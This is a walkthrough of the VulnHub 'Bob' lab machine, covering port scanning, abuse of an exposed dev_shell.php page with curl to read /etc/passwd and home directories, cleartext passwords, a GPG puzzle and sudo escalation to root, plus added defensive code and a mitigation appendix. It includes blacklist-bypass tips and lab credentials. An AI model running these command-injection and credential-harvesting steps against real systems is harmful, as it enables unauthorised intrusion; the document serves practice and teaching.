Bob: 1.0.1 ~ Vulnhub - Walkthrough

Objective

Acquire root access and get hold of the flag in /

Source: [VulnHub.com]

Status: [Completed]

Methodology

Define our target

root@kali:# export TANGO=192.168.56.101

Discovery

root@kali:# nmap -O -p- -sT -sV -T5 -o nmap.txt $TANGO

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD 1.3.5b
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
25468/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Entry Point #1 - Port 80 (HTTP)

Enumeration

root@blaksec:~# nikto -h $TANGO
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2018-05-24 18:19:38 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x591 0x5669af30ee8f1 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7539 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2018-05-24 18:19:49 (GMT-4) (11 seconds)
---------------------------------------------------------------------------

Let's take a closer look at that robots.txt

root@kali:~# curl http://$TANGO/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html

dev_shell.php sounds very promising. Dive dive dive!

Exploitation

After a good 30 mins of poking, it appeared there is some sort of blacklist - commands like ls, pwd, cat, nc are being blocked. Nothing we can't work around though - all we had to do is replace ls with find, echo, dir, and cat with strings (see "Exploiting web shells - working your way around blacklisted commands" for more sweet workarounds).
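Why the filter gave so little protection, as an added example (not the VM's dev_shell.php, whose source is not shown on this page): a name-based denylist modelled on the blocked commands above, next to an allowlist design where the client only names an action and the server owns the argument vector. The filter logic, the `ACTIONS` table, `BASE_DIR` and all function names are assumptions made for illustration.

```python
import os
import shlex

# Names the walkthrough reports as blocked; the real filter's logic is assumed.
DENYLIST = {"ls", "pwd", "cat", "nc"}

def denylist_permits(command_line):
    """Assumed model of the weak filter: reject only when a token is a denied name."""
    try:
        tokens = shlex.split(command_line)
    except ValueError:  # unbalanced quotes
        return False
    return not any(os.path.basename(tok) in DENYLIST for tok in tokens)

# Hardened design (hypothetical): fixed argv per action, no shell, no free-form text.
ACTIONS = {
    "list": ["/bin/ls", "-l", "--"],
    "disk": ["/bin/df", "-h", "--"],
}
BASE_DIR = "/var/www/html"  # assumed web root

def build_argv(action, rel_path, base_dir=BASE_DIR):
    """Return an argv suitable for subprocess.run(argv) without a shell, or raise."""
    if action not in ACTIONS:
        raise PermissionError("unknown action: %r" % action)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, rel_path))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes %s" % base)
    return ACTIONS[action] + [target]

def is_allowed(action, rel_path):
    try:
        build_argv(action, rel_path)
        return True
    except PermissionError:
        return False

if __name__ == "__main__":
    # Command lines taken from the walkthrough text.
    for cmd in ("ls /home", "cat /etc/passwd", "find /home", "strings /etc/passwd"):
        print("denylist  %-22s -> %s" % (cmd, "allowed" if denylist_permits(cmd) else "blocked"))
    for req in (("list", "."), ("list", "../../etc/passwd"), ("strings", "/etc/passwd")):
        print("allowlist %-30r -> %s" % (req, "allowed" if is_allowed(*req) else "rejected"))
```

The denylist stops the named binaries but not other tools with the same effect, while the allowlist rejects anything that is not a known action on a path inside the base directory.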

Let's see what we have!

root@blaksec:~# curl -s -d "in_command=strings /etc/passwd" -X POST http://$TANGO/dev_shell.php
...
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:117:65534::/run/proftpd:/bin/false
ftp:x:118:65534::/srv/ftp:/bin/false
...

Looks like a few regular users on this host. Check them out

curl -s -d "in_command=find /home" -X POST http://$TANGO/dev_shell.php -o files_home.txt

A bunch of goodies turned up! The most notable ones:

/home/seb/proftpd-1.3.3c
/home/bob/.old_passwordfile.html
/home/bob/Documents/Secret
/home/bob/Documents/Secret/Keep_Out
/home/bob/Documents/Secret/Keep_Out/Not_Porn
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh
/home/bob/Documents/Secret/Keep_Out/Porn
/home/bob/Documents/Secret/Keep_Out/Porn/no_porn_4_u
/home/bob/Documents/staff.txt
/home/bob/Documents/login.txt.gpg
/home/bob/Downloads/Wheel_Of_Fortune.py
/home/bob/Downloads/Hello_Again.py
/home/elliot/theadminisdumb.txt

Quick look through the files... a few quite interesting entries! The last one was fun to read - elliot b*ches and moans about the admin bragging about his new password.. wait.. yay! We have a password!

root@blaksec:~# curl -s -d "in_command=strings /home/elliot/theadminisdumb.txt" -X POST http://$TANGO/dev_shell.php
...
theadminisdumb
...

Aaaaaand we're in!!!

# ssh elliot@$TANGO -p 25468
  __  __ _ _ _                        _____                          
 |  \/  (_) | |                      / ____|                         
 | \  / |_| | |__  _   _ _ __ __ _  | (___   ___ _ ____   _____ _ __ 
 | |\/| | | | '_ \| | | | '__/ _` |  \___ \ / _ \ '__\ \ / / _ \ '__|
 | |  | | | | |_) | |_| | | | (_| |  ____) |  __/ |   \ V /  __/ |   
 |_|  |_|_|_|_.__/ \__,_|_|  \__, | |_____/ \___|_|    \_/ \___|_|   
                              __/ |                                  
                             |___/                                   


elliot@192.168.56.101's password: 
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

elliot@Milburg-High:~$

Poking around /home(s)... seb does not seem to have anything interesting and neither does jc. bob, however, is worth exploring!

elliot@Milburg-High:/home/bob$ cat .old_passwordfile.html 
hey n there .old_passwordfile.html
elliot@Milburg-High:/home/bob$ alias
alias cat='echo hey \n there'

*** rolling my eyes ***

elliot@Milburg-High:/home/bob$ strings .old_passwordfile.html 
<html>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>

su'd to each of these users just to see if there were any interesting sudo roles, but nothing fun there, so back to bob!

elliot@Milburg-High:/home/bob/Documents$ file login.txt.gpg
file login.txt.gpg
login.txt.gpg: GPG symmetrically encrypted data (AES cipher)

Spent a good hour poking around trying to find the right pass and then found this file. Well, actually I found it earlier and opened it prob 5-6 times.. and then stared at it.. and then squinted.. and it's only when I executed that notes.sh script that it hit me!

elliot@Milburg-High:/home/bob$ ./Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh 
-= Notes =-
Harry Potter is my faviorite
Are you the real me?
Right, I'm ordering pizza this is going nowhere
People just don't get me
Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>
Cucumber
Rest now your eyes are sleepy
Are you gonna stop reading this yet?
Time to fix the server
Everyone is annoying
Sticky notes gotta buy em

The first letters of the note lines spell 'HARPOCRATES'.

Let's test if it's the right pass

elliot@Milburg-High:/home/bob/Documents$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
<g --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: keybox '/home/seb/.gnupg/pubring.kbx' created
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_

From here it's pretty much a wrap up

elliot@Milburg-High:/home/bob$ su bob
Password: 
bob@Milburg-High:~$ sudo -l
[sudo] password for bob: 
Matching Defaults entries for bob on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bob may run the following commands on localhost:
    (ALL : ALL) ALL

bob@Milburg-High:~$ sudo su -

root@Milburg-High:/# strings flag.txt 
CONGRATS ON GAINING ROOT
        .-.
       (   )
        |~|       _.--._
        |~|~:'--~'      |
        | | :   #root   |
        | | :     _.--._|
        |~|~`'--~'
        | |
        | |
        | |
        | |
        | |
        | |
        | |
        | |
        | |
   _____|_|_________ Thanks for playing ~c0rruptedb1t
root@Milburg-High:/#

Final Notes

Sometimes it is OK to follow your gut feeling and deviate from your own style (e.g. trying to spawn a reverse shell) - fun things can be lying in plain view.

Appendix A: Vulnerability Detail and Mitigation

Insufficiently Protected User Credentials
Rating: High
Description: Copies of user passwords were found stored in clear-text files.
Impact: Taking over an account would allow a perpetrator to access all privileges and functions granted to that account, including but not limited to accessing restricted data and processes, running restricted programs, and elevated access through sudo roles.
Remediation: Put policies in place educating users about the dangers of storing credentials in unprotected files. Establish a process to perform periodic system scans to detect such data.
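
One way to implement the periodic scan named in the remediation, as an added example that is not part of the original walkthrough: walk home directories and flag files readable by group or other that contain `account:secret` lines for local account names. The function names, the 1 MiB size cap and the sample tree are assumptions; the sample data is constructed and uses placeholder secrets.

```python
import os
import pathlib
import re
import stat
import tempfile

def local_users(passwd_text):
    """Account names: first colon-separated field of each passwd-format line."""
    return {ln.split(":", 1)[0] for ln in passwd_text.splitlines() if ":" in ln}

def scan_tree(root, users, max_bytes=1 << 20):
    """Return (path, line_no, account) for each 'account:secret' line found."""
    if not users:
        return []
    pat = re.compile(r"^\s*(%s)\s*:\s*\S" % "|".join(map(re.escape, sorted(users))))
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                shared = st.st_mode & (stat.S_IRGRP | stat.S_IROTH)
                if not (stat.S_ISREG(st.st_mode) and shared) or st.st_size > max_bytes:
                    continue  # skip non-files, owner-only files and huge files
                with open(path, "r", errors="replace") as fh:
                    for n, line in enumerate(fh, 1):
                        m = pat.match(line)
                        if m:
                            findings.append((path, n, m.group(1)))  # secret not recorded
            except OSError:
                continue  # unreadable or vanished file
    return findings

def demo():
    """Constructed sample tree modelled on the file names in the walkthrough."""
    users = local_users("jc:x:1002:1002:\nseb:x:1003:1003:\nbob:x:1001:1001:\n")
    samples = {"bob/.old_passwordfile.html": ("<html>\njc:PLACEHOLDER\nseb:PLACEHOLDER\n</html>\n", 0o644),
               "bob/Documents/staff.txt": ("Staff notes: nothing secret here\n", 0o644),
               "bob/private.txt": ("bob:PLACEHOLDER\n", 0o600)}
    with tempfile.TemporaryDirectory() as root:
        for rel, (text, mode) in samples.items():
            path = pathlib.Path(root, rel)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(text)
            path.chmod(mode)
        return [(os.path.relpath(p, root), n, u) for p, n, u in scan_tree(root, users)]

if __name__ == "__main__":
    for rel, n, user in demo():
        print("cleartext credential candidate: %s line %d (account %s)" % (rel, n, user))
```

On a real host, feed `local_users` the contents of /etc/passwd and point `scan_tree` at /home; findings are candidates for review, since any line that starts with an account name and a colon will match.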